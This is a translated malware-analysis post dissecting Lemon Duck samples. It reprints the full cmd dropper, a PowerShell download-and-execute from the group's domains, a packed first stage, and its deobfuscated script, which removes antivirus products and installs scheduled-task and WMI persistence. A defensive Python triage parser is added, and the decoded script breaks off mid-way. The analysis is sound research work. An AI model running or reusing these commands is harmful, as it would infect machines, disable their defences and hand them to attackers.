Sample Analysis of the Lemon Duck (柠檬鸭) Group
This article is from the WeChat official account HACK学习呀, 2021.01.14 14:31:30


Background

Analysis

1.txt

Its contents are as follows

cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&schtasks /run /TN Autocheck^&schtasks /delete /TN BIzdRfgY /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&schtasks /run /TN BIzdRfgY^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe

Lightly formatted, with notes

cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&
echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&
echo "*" >c:\windows\temp\eb.txt&
// configure the network interface and firewall
echo netsh interface ipv6 install >>c:/windows/temp/p.bat &
echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&
echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&
// PowerShell command
echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&
// scheduled task setup
schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr "c:\windows\kNnk.exe" /F) else start /b sc start Schedule^&ping localhost^&
// check whether the Task Scheduler service is running
sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&
// mshta downloader; the URL was no longer reachable at the time of analysis
schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT"^&
// scheduled task operations (delete, create, run)
schtasks /run /TN Autocheck^&schtasks /delete /TN BIzdRfgY /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN BIzdRfgY /tr "c:\windows\kNnk.exe"^&schtasks /run /TN BIzdRfgY^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&
// write the batch file; its content starts the service
echo net start Ddriver >>c:/windows/temp/p.bat&
echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&
echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&
echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&
echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&
cmd.exe /c c:/windows/temp/p.bat&
cmd /c c:\windows\temp\installed.exe

What the batch file does

Adds firewall rules and forwards requests on ports 65532, 65531 and 65529 to 1.1.1.1.
Creates scheduled tasks that launch the payload periodically.
Writes a batch file that checks the cmd.exe process count and reboots the machine if there are more than 10 cmd.exe processes.
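As an added example (not code from the post), here is a small Python triage parser that pulls the persistence artefacts described above out of the raw 1.txt command line without executing it. The sample is a constructed excerpt assembled from segments of the page's command; the regexes are this example's own and keyed to the cmd/netsh/schtasks syntax seen in the dropper.

```python
"""Static triage of the one-line cmd dropper (1.txt): list what it would
persist, forward, open and fetch, without running any of it."""
import re

# Constructed excerpt: segments of the page's 1.txt command, joined with the
# same & / ^& separators the original uses (^& is the escaped & that the
# dropper echoes into p.bat so the inner commands run from the batch file).
SAMPLE_DROPPER = (
    "cmd /c echo RmMrcM >> c:\\windows\\temp\\msInstall.exe"
    "&echo copy /y c:\\windows\\temp\\msInstall.exe c:\\windows\\kNnk.exe>c:/windows/temp/p.bat"
    "&echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat"
    "&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat"
    "&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat"
    "&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat"
    "&echo start /b sc start Schedule^&ping localhost^&schtasks /delete /TN Autocheck /f"
    "^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck"
    " /tr \"cmd.exe /c mshta http://w.zz3r0.com/page.html?pBS_S-AUDIT\""
    "^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn BIzdRfgY /tr \"c:\\windows\\kNnk.exe\" /F"
    "^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr \"c:\\windows\\temp\\installed.exe\""
    "^&schtasks /run /TN Autoload >>c:/windows/temp/p.bat"
    "&echo net start Ddriver >>c:/windows/temp/p.bat"
    "&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\\windows\\temp\\installed.exe"
)

# A token ends at whitespace, at a batch separator (& or escaped ^&) or at a
# redirection, which is why \S+ is not used for names and paths.
_TOK = r"[^\s^&>|]+"
_TASK = re.compile(rf'schtasks /create\s(.*?)/tn\s+({_TOK})\s+/tr\s+"([^"]*)"', re.I)
_SCHED = re.compile(r"/sc\s+(\w+)\s+/mo\s+(\d+)", re.I)
_PROXY = re.compile(r"portproxy add v4tov4 listenport=(\d+) connectaddress=(\S+) connectport=(\d+)", re.I)
_FWOPEN = re.compile(rf"firewall add portopening tcp (\d+) ({_TOK})", re.I)
_SERVICE = re.compile(rf"\b(?:net|sc) start ({_TOK})", re.I)
_URL = re.compile(r"""https?://[^\s"'^&)]+""")
_WRITE = re.compile(rf">>?\s*([A-Za-z]:[\\/]{_TOK})")
_COPY = re.compile(rf"copy /y ({_TOK})\s+({_TOK})", re.I)


def triage_dropper(cmdline: str) -> dict:
    """Return the persistence and network artefacts found in one cmd line."""
    tasks = []
    for opts, name, action in _TASK.findall(cmdline):
        sched = _SCHED.search(opts)          # e.g. /sc MINUTE /mo 50
        tasks.append({
            "name": name,
            "action": action,
            "schedule": sched.group(1).upper() if sched else None,
            "modifier": int(sched.group(2)) if sched else None,
        })
    return {
        "tasks": tasks,
        "portproxy": _PROXY.findall(cmdline),        # (listen, target, port)
        "firewall_open": _FWOPEN.findall(cmdline),   # (port, rule name)
        "services": _SERVICE.findall(cmdline),
        "urls": _URL.findall(cmdline),
        "files_written": list(dict.fromkeys(_WRITE.findall(cmdline))),
        "copies": _COPY.findall(cmdline),            # (source, destination)
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage_dropper(SAMPLE_DROPPER), indent=2))
```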

PowerShell command: downloads and executes a PS script

The PowerShell argument decodes to the following

IEX(New-Object Net.WebClient).DownloadString('http://t.amynx.com/gim.jsp')

gim.jsp, once downloaded, turns out to be a PowerShell file

gim.jsp: first-stage attack script

gim.jsp

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('<hex-encoded Deflate blob omitted>'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

After decoding, the content is as follows (reference: "5分钟解码powershell payload", i.e. decoding a PowerShell payload in 5 minutes)

$2hl  = ")'x'+]43[emOHSP$+]12[eMOhSp$ (& |)63]RaHC[,'NCh'  ECalpeR-  93]RaHC[,'Uft'  ECalpeR- )''+') )43]RaHC[,)911]RaHC[+07]RaH'+'C[+99]R'+'aHC[(ECaLpe'+'R-93]R'+'aHC[,)511]RaHC[+9'+'7]RaHC[+711]RaHC[( '+'eCalpERc- 421]R'+'aHC[,UftQjTUftECaLpeR-63]RaHC[,UftJdCUfteCalpERc-'+' 29]Ra'+'HC[,UftTR9Uft ECaLpeR-  69]RaHC[,)2'+'11]RaHC[+811]RaHC[+20'+'1]RaHC[(  eCalpERc-)UftF/ astR nt/ eteled/ sksathcsF/ 1astR nt/ etUft+Ufteled/ sksathcs'+'F/ 2astR ntUft+Uft/ eteled/ sksathcs}ecroF??? 1 e'+'ulaV- DROWDUft'+'+Uft epyT- noisserpmoCelbasiD wFcs'+'ret'+'emaraPTR9revreSnamnaLTR9secivreSTR9teSlortnoCtnerruCTR9METSYSTR9:MLKHwFc htaP- ytreporPmetI-teS    kcolb=noit'+'ca 531=troplac'+'ol pc'+'t'+'=locotorp ni=rid w'+'FUft+Uft'+'c531ynedwFc=emanU'+'ft+Uft elur dda llawerif llawerifvda hsten    kcolb=noitca 544=troplacolUft+Uft pct'+'=locotorp ni=rid wFc54'+'4yn'+'edwFUft+Uftc=eman elur d'+'da llawerif llaUft+Uftwerifvda hsten    35=troptcennoc 1.1.1.1=sserddatcennoUft+Uftc 92556=tropnetsil 4vot4v dda yxorptroUft+UftpUft+Uft ecafUft+Uftretni exe.hsten    dSNDS 92556 '+'pct gninepotrop dda llawerif exe.hsten c/ exe.'+'dmc    Uft+Uft}'+'  '+'  '+'5 peels-'+'trats        })}w'+'Uft'+'+UftFcdmcim'+'wJdC'+' c- neddih w- llehs'+'rewop c/wFc=etalpm'+'eTeniLdnammoC;wFcexe.dmcTR923metsysTR9swodniwTR9:cwFc=htaPelbatucexE;e'+'ma'+'NehtJdC+wF'+'ccwFc=emaN{@ stnemugrA- wFcnoitpircsbusTR9toUft+UftorwFc eUft+UftcapsemaN-'+' r'+'emusnoCtnevEeniLdnamm'+'Uft+UftoC ssalC- ecnatsnIimW-teS(=rem'+'usnoC;)potS n'+'oitcUft+Uf'+'tArorrE- };wFcsOumetsyS_SOfUft+UftreP_Uft+UftataDdet'+'tamroFfreP_23niWsOu ASI ecUft+Uftnats'+'nItegraTUft'+'+Uft EREHW 0063 NIHTIW tnevEnUf'+'t+UftoitUft+UftacifidoMecnatsnI__ MORF * TCELESwF'+'c=yreuQ;wFcLQWwFc=egaugnaLyreuQ;wFc2vmicTRUft+Uft9toorwF'+'c=ecapSemaNtnevE;emaNehtJdC+wFcfwFc=emaN{@ s'+'tnemugrA- '+'wFcnoitp'+'ircsbusTR9toorwFc ecapSemaN- retliFtn'+'evE__ ssalC- ecnatsnIimW-teS(=retliF{@ stnemugrA- Uft+UftwFcnoitpircsbusTR'+'Uft+Uf'+'t9tooUft+UftrwFc '+'ecapsemaN- 
gnidniBremusnoCoTretliF__ ssalC- ecnatsnIimW-teS      '+'  )sOupsj.aasOu,sOupsj.asOu(ecalper.))5(gnirtsbus'+'.uJdC,Uft+UftsOu2UsOu(ecalper.))5,0'+'(gnirt'+'sbus.uJdC,sOu1UsOu(ecalper.spmtJdC=dmcimwJdC        '+'naR'+'teg=emaNehtJdC    '+'    U'+'ft+U'+'ft{)suJdC ni uJdC(hcaerofUft+Uft    potS noitcArorrE- };wFcsOumetsyUft+UftS_SOfreP_ataDdettamroFfreP_23niWsOu ASI ecnatsnItegraT EREHW 0063'+' NIHTIW tnevEnoitacif'+'idoMecnatsnI__ MORF * TCELESw'+'Fc=yreuQ;wFcLQWwFc=eg'+'augnaLyreuQ;wFc2vmiUft+UftcTR9toorwFc=ecapSemaNtnevE;wFcllabkcalbwFc'+'=emaN{@ stneUft+UftmugrA- wFcnoitpiUft+UftrcsbusT'+'R9toorwFUft+Uftc ecapSemaN- retliFtnevE__ ssalC- ecnatsnIimW-teS    {)1tiodJdC'+' ton-(fi'+'}{hctac}wFcsOullabkcalbsOuU'+'ft+Uft=emaNwFc retlif- sOunUft+UftoitpircsbusTR9toorsOu ecapSemaNUft+Uft- retliFtnevE__ ssalC- tcejbOIMW-teG=1tiodJdC{yrt}'+'}    5 pUft'+'+U'+'fteels-tra'+'tUft+Ufts        '+'wFcntJdCTR9fntJdCwFc nt/ nur/ sksathcs        1 peelsUft+U'+'ft-trats        }        Uft+Uft}            }{hctac}                }    '+'                llun-tuoQjT)llunJUft+'+'UftdC ,0 ,llunJdC ,llunJdC'+' ,4 ,)))5('+'gnirtsbus.uJdC,sOu2UsOu(ecalper.))Uft+Uf'+'t5,0(gnirtsbus.uJdC,sOu1UsO'+'u(ecalper.spmtJdC,wFcDMC_SPwFc(ecalper.lmX.ksatJdC ,emaN.ksatJdC(ksaTretsigeR.redlofJd'+'C                            {))wFcDMC_'+'SPwFc('+'sniatno'+'C.stneUft+UftmugrA.noitcaJdC(fi                    {yrt                { )snoit'+'cA.noitinUft+UftifeD.ksatJdC ni noitcUft+UftaJdC( hcaerof            {)'+'metiksatJdC ni ksatUft+UftJdC(hcUft+Uftaerof        )Uft+Uft1(sksaTteG.redlofJdC=metiksatJdC        )wFcfntJUft+UftdCTR9wFc(redloFteG.vrstsJdC=redlofJdC        1 peels-trats        '+''+'}        wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM'+' cs/ Uft+Uf'+'te'+'taerc/ sksathcs            { esle }        wFcDMC_SP c- neddih w- llehsrewopwFc rt/ F/ wFcntJdCTR9fntJdCwFc nt/ 06 om/ ETUNIM cs/ metsys ur/ etaerc/ sksUft+'+'Uftathcs            {)asJdC(fi        naRteg 
= ntJdC        }}naRUf'+'t+'+'U'+'ftteg=fntJdC{esle})naRteg(+sOuTR9swodniWT'+'R9tfoSorUft+'+'UftciMsOu=fntJdC{)asJdC(fi{)2 qe- Uft+Uft3%iJdC('+'fi        }naRteg=fntJdC{)1 qe- 3%iUft+Uf'+'tJdC(fi        }sOUft+Uft'+'usOu=f'+'ntJdC{)0 qe- 3%iJdC(fi        )uJdC,suJdUft+UftC(fOxednI::]yarra[ = iJdC        {)suJdC ni uJdC(hcaerof    }    wFcllabkcalbw'+'Fc rt/ F/ llabkcalb'+' nt/ 021 omUft+Uft/ ETUNIM csUft+Uft/ etaerc/ sksathcs        { esle }    wFcllabkcal'+'bwF'+'c rt/ F/ llabkcalb nt/ Uft+Uft021 om/ ETUNIM cs/ metsys ur/ etaer'+'c/ '+'sksathcs        {)asJdC(fi    {)tiodJdC ton-(fi}{hctac})'+'wF'+'Uft+'+'UftcllabkcalbwFUft+'+'Uftc(ksaTteG.)wFcTR9wFc(redloFt'+'eG.vrstsJdC=ti'+'odJdC{yrt)(tcennoC.vrsts'+'JdCU'+'ft+UftecivreS.eludehcS tcejbOmoC- tcejbO-weN = vrstsJdCUft+Uft)sOumo'+'c.xnyma.tsOu,sOumoc.g9rez.tsOu,sOumUft+UftocUft+Uft.0r3zz.tsOu(@=suJdC}))6%)'+'modnaR-teG(+6( tnuoC- modnaR-teGQj'+'T)221..79+09..Uft+Uft56+75..84(]][rahc[(nioj- nruter{)Uft+Uft(naRteg noi'+'tcnuf)wFcrotartsinimd'+'A'+'wFc ]eloRnItUft+UftliuBswodni'+'Uf'+'t+UftW.Uft+UftlapUft+U'+'fticnirP.ytiruUft+Uftc'+'eS[(eloRnIsI.))(tnerruCteG::]ytitnedIswodni'+'W.lapicnirP.ytiruceS[]lapicnirPswodniW.lapicnirP.'+'ytUft+UftiruceS[(=asJdCsOu))sOusOu'+'*sOusOunioj-))modnar(,DIUU.)tcu'+'dorPmetsySretupmoC_Uft+Uft23niW tcejboimw-teg(,EMANRESU:vneJdC,EMANRETU'+'Uft+UftPMOC:vneJdC(@(+sOusOu?sOu+Uft+UftvJdC+sOupsj.a/sOusOu+lruJdC(a;sOusOu2UsOusOu+sOusOu1UsOusOu+Uft+UftsOusOu//:ptthsOusOUft+Uftu=lruJdC}}})bJdC]][rahc['+'nioj-(xepvfI{Uft+Uft))))]Uft+Uft171..0[dJ'+'dC]][rahc[(nioUft+Uftj-(gnirtS46esaBmorF::]trevnoc['+',Uft+Uft)redivorPecivUft+UftrUft+UfteSotpyrC'+'1AHS.yhpargotpyrC.ytiruceS tcejb'+'O-weN(,bJdC('+'ataDyf'+'irev.rUft+UftJdC(fi;)Uft+UftpJ'+'dC(sretemaraPtrop'+'mI.rJdC;redivUft+UftorPecivreSotpyrCASR.yhpargotpyrC.ytir'+'uceS 
tcejbO-weN=rJdC;10x0,Uft'+'+Uft00x0,10x0=tnenUft+UftopxE.pJdC;)sOuUft+UftsOu=01aHdLOqfpr7R6YIef1j1'+'vcQUpL2/zlbjpCLDjb58M0C5YluqWknCUeNLh4feqi4Rzxn3cASZ8cwkR0r03mugLbuLp818LicDW0RY/Tm2'+'r3K7mlHYIcitzTzvUft+Uft2NN3Mw9I'+'FUft+'+'UftPj4krWf2'+'6VtHbuNnmTN3/v8vgd'+'mpX'+'B1Gv'+'Xu71oWm2sOusO'+'u(gnirtS46esaBmUft+UftorF::]trevnUft+Uftoc['+'=suludoM.pUft'+'+UftJUft+UftdC;sretemaraPASRUft+Uft.yhpargotpyrC.ytiruceS tcejbO-weUft+UftN=pJdC;]cJdC..371[dJdC=bJ'+'dC{)371 tg- cJd'+'C(fi;tnuoc.dJdC=cJ'+'dC;'+')uJdC(wFcataDdaolnwoDwFc.)tneilpvfCbeW.teN tce'+'pvfjbO-'+'wpvfeN(=dJdC{)uJdC(a noitcnufsOu=spmtJdC)sOuddMMyyyy_sOu tamroF-'+' etaD-teG(+wFcvJdC'+'?wFc=vJdCtratser'+'Uft+Ufton/ sexobgsmsserppus/ '+'tnelisyrev/ wFceUft'+'+Uftxe.000sninuTR9erawlaM-itnATR9setyberawlaMTR91~argorPTR'+'9:CwFc c/ dmcevitcaretn'+'ion/ llatsninu llac wFcsOu%ytiruceS notroN%sOu ekil Uft+UftemanwFc erehw tcudorp exe.cimw b/ trats c/ dmcevitcaretnion'+'/ llats'+'n'+'inu llac wFcsOu%suriVitnA%sOu ekil emanwFc erehw t'+'cudorp exe.cimw b/ trats c/ dmcevitcaretnion/ llatsn'+'inu'+' llac wFcsOu%ytiruceS%sOu ekil emanwFc erehw '+'tcudorp exe.cimw b/ trats c/ dmcevitcaretnion/ Uft+Uftl'+'latsninu llUft+Uftac wF'+'csOu%pva%sOu ekil emanwFcU'+'ft+Uft ereh'+'w tcudorpUft+Uft exe.cimw b/ trats c/ dmcevitcaretnion/ llatsninu llac wFcsOu%tsaUft+Uftva%sOu ekil'+' emanwFc erehw tcudorp exe.cimw b/ trats c/ dmcevitcaretnion/ llatsninu llac wF'+'csOu%%yks'+'re'+'psa'+'K%%sOuUft+Uft ekil'+' emanwFc er'+'ehw tcudorp exe.cimw b/ trats c/'+' '+'dmc'+'evitcare'+'tnio'+'n/ llatsninu Uft+Uftllac wFcsOu%tesE%sOu ekil emanwFc erehw tcudorp eUft+Uftxe.cimw b/ trats c/ d'+'mcUft(( ( )UftUftnIoJ-U'+'ftxUft+]3,1[)(GNiRtsOT.EcNeREFERpesobrEVNCh (.'((" ; ((  GET-VaRIaBlE 2Hl  -vAlUEOn)[- 1..- ((  GET-VaRIaBlE 2Hl  -vAlUEOn).LENGTh ) ]-JoIN'' ) 

After reversing and tidying the string

 ; "(('.( hCNVErbosepREFEReNcE.TOstRiNG()[1,3]+tfUxtf'+'U-JoIntfUtfU) ( ((tfUcm'+'d /c start /b wmic.extfU+tfUe product where cFwname like uOs%Eset%uOscFw calltfU+tfU uninstall /n'+'oint'+'eractive'+'cmd'+' '+'/c start /b wmic.exe product whe'+'re cFwname '+'like tfU+tfUuOs%%K'+'asp'+'er'+'sky%%uOsc'+'Fw call uninstall /nointeractivecmd /c start /b wmic.exe product where cFwname '+'like uOs%avtfU+tfUast%uOscFw call uninstall /nointeractivecmd /c start /b wmic.exe tfU+tfUproduct w'+'here tfU+tf'+'UcFwname like uOs%avp%uOsc'+'Fw catfU+tfUll uninstal'+'ltfU+tfU /nointeractivecmd /c start /b wmic.exe product'+' where cFwname like uOs%Security%uOscFw call '+'uni'+'nstall /nointeractivecmd /c start /b wmic.exe produc'+'t where cFwname like uOs%AntiVirus%uOscFw call uni'+'n'+'stall /'+'nointeractivecmd /c start /b wmic.exe product where cFwnametfU+tfU like uOs%Norton Security%uOscFw call uninstall /noi'+'nteractivecmd /c cFwC:9'+'RTProgra~19RTMalwarebytes9RTAnti-Malware9RTunins000.extfU+'+'tfUecFw /verysilent'+' /suppressmsgboxes /notfU+tfU'+'restartCdJv=cFw?'+'CdJvcFw+(Get-Date '+'-Format uOs_yyyyMMdduOs)CdJtmps=uOsfunction a(CdJu){CdJd=(Nefvpw'+'-Objfvp'+'ect Net.WebCfvplient).cFwDownloadDatacFw(CdJu)'+';Cd'+'Jc=CdJd.count;if(C'+'dJc -gt 173){Cd'+'Jb=CdJd[173..CdJc];CdJp=NtfU+tfUew-Object Security.Cryptography.tfU+tfURSAParameters;CdtfU+tfUJtfU+'+'tfUp.Modulus='+'[cotfU+tfUnvert]::FrotfU+tfUmBase64String(u'+'OsuOs2mWo17uX'+'vG1B'+'Xpm'+'dgv8v/3NTmnNubHtV6'+'2fWrk4jPtfU'+'+tfUF'+'I9wM3NN2tfU+tfUvzTzticIYHlm7K3r'+'2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv'+'1j1feIY6R7rpfqOLdHa10=uOstfU+tfUuOs);CdJp.ExpotfU+tfUnent=0x01,0x00tfU+'+'tfU,0x01;CdJr=New-Object Secu'+'rity.Cryptography.RSACryptoServiceProtfU+tfUvider;CdJr.Im'+'portParameters(Cd'+'JptfU+tfU);if(CdJtfU+tfUr.veri'+'fyData'+'(CdJb,(New-O'+'bject 
Security.Cryptography.SHA1'+'CryptoSetfU+tfUrtfU+tfUviceProvider)tfU+tfU,'+'[convert]::FromBase64String(-jtfU+tfUoin([char[]]Cd'+'Jd[0..171tfU+tfU]))))tfU+tfU{Ifvpex(-join'+'[char[]]CdJb)}}}CdJurl=utfU+tfUOsuOshttp://uOsuOstfU+tfU+uOsuOsU1uOsuOs+uOsuOsU2uOsuOs;a(CdJurl+uOsuOs/a.jspuOs+CdJvtfU+tfU+uOs?uOsuOs+(@(CdJenv:COMPtfU+tfU'+'UTERNAME,CdJenv:USERNAME,(get-wmiobject Win32tfU+tfU_ComputerSystemProd'+'uct).UUID,(random))-joinuOsuOs*'+'uOsuOs))uOsCdJsa=([SecuritfU+tfUty'+'.Principal.WindowsPrincipal][Security.Principal.W'+'indowsIdentity]::GetCurrent()).IsInRole([Se'+'ctfU+tfUurity.Princitf'+'U+tfUpaltfU+tfU.WtfU+t'+'fU'+'indowsBuiltfU+tfUtInRole] cFw'+'A'+'dministratorcFw)funct'+'ion getRan(tfU+tfU){return -join([char[]](48..57+65tfU+tfU..90+97..122)T'+'jQGet-Random -Count (6+(Get-Random'+')%6))}CdJus=@(uOst.zz3r0.tfU+tfUcotfU+tfUmuOs,uOst.zer9g.comuOs,uOst.amynx.c'+'omuOs)tfU+tfUCdJstsrv = New-Object -ComObject Schedule.ServicetfU+tf'+'UCdJ'+'stsrv.Connect()try{CdJdo'+'it=CdJstsrv.Ge'+'tFolder(cFw9RTcFw).GetTask(ctfU'+'+tfUFwblackballctfU'+'+tfU'+'Fw'+')}catch{}if(-not CdJdoit){    if(CdJsa){        schtasks'+' /c'+'reate /ru system /sc MINUTE /mo 120tfU+tfU /tn blackball /F /tr c'+'Fwb'+'lackballcFw    } else {        schtasks /create /tfU+tfUsc MINUTE /tfU+tfUmo 120 /tn '+'blackball /F /tr cF'+'wblackballcFw    }    foreach(CdJu in CdJus){        CdJi = [array]::IndexOf(CtfU+tfUdJus,CdJu)        if(CdJi%3 -eq 0){CdJtn'+'f=uOsu'+'tfU+tfUOs}        if(CdJt'+'fU+tfUi%3 -eq 1){CdJtnf=getRan}        if'+'(CdJi%3tfU+tfU -eq 2){if(CdJsa){CdJtnf=uOsMictfU'+'+tfUroSoft9R'+'TWindows9RTuOs+(getRan)}else{CdJtnf=gettf'+'U'+'+t'+'fURan}}        CdJtn = getRan        if(CdJsa){            schtatfU'+'+tfUsks /create /ru system /sc MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw        } else {            schtasks /creat'+'et'+'fU+tfU /sc '+'MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw        }'+''+'      
  start-sleep 1        CdJfolder=CdJstsrv.GetFolder(cFw9RTCdtfU+tfUJtnfcFw)        CdJtaskitem=CdJfolder.GetTasks(1tfU+tfU)        foreatfU+tfUch(CdJtfU+tfUtask in CdJtaskitem'+'){            foreach (CdJatfU+tfUction in CdJtask.DefitfU+tfUnition.Ac'+'tions) {                try{                    if(CdJaction.ArgumtfU+tfUents.C'+'ontains'+'(cFwPS'+'_CMDcFw)){                            C'+'dJfolder.RegisterTask(CdJtask.Name, CdJtask.Xml.replace(cFwPS_CMDcFw,CdJtmps.replace(u'+'OsU1uOs,CdJu.substring(0,5t'+'fU+tfU)).replace(uOsU2uOs,CdJu.substring'+'(5))), 4, '+'CdJnull, CdJnull, 0, CdtfU'+'+tfUJnull)TjQout-null                '+'    }                }catch{}            }tfU+tfU        }        start-tf'+'U+tfUsleep 1        schtasks /run /tn cFwCdJtnf9RTCdJtncFw'+'        stfU+tfUt'+'art-sleetf'+'U+'+'tfUp 5    }'+'}try{CdJdoit1=Get-WMIObject -Class __EventFilter -tfU+tfUNameSpace uOsroot9RTsubscriptiotfU+tfUnuOs -filter cFwName=tfU+tf'+'UuOsblackballuOscFw}catch{}'+'if(-not '+'CdJdoit1){    Set-WmiInstance -Class __EventFilter -NameSpace ctfU+tfUFwroot9R'+'TsubscrtfU+tfUiptioncFw -ArgumtfU+tfUents @{Name='+'cFwblackballcFw;EventNameSpace=cFwroot9RTctfU+tfUimv2cFw;QueryLangua'+'ge=cFwWQLcFw;Query=cF'+'wSELECT * FROM __InstanceModi'+'ficationEvent WITHIN '+'3600 WHERE TargetInstance ISA uOsWin32_PerfFormattedData_PerfOS_StfU+tfUystemuOscFw;} -ErrorAction Stop    tfU+tfUforeach(CdJu in CdJus){tf'+'U+tf'+'U    '+'    CdJtheName=get'+'Ran'+'        CdJwmicmd=CdJtmps.replace(uOsU1uOs,CdJu.subs'+'tring('+'0,5)).replace(uOsU2uOstfU+tfU,CdJu.'+'substring(5)).replace(uOsa.jspuOs,uOsaa.jspuOs)  '+'      Set-WmiInstance -Class __FilterToConsumerBinding -Namespace'+' cFwrtfU+tfUoot9t'+'fU+tfU'+'RTsubscriptioncFwtfU+tfU -Arguments @{Filter=(Set-WmiInstance -Class __Eve'+'ntFilter -NameSpace cFwroot9RTsubscri'+'ptioncFw'+' -Argument'+'s @{Name=cFwfcFw+CdJtheName;EventNameSpace=c'+'Fwroot9tfU+tfURTcimv2cFw;QueryLanguage=cFwWQLcFw;Query=c'+'FwSELECT * FROM 
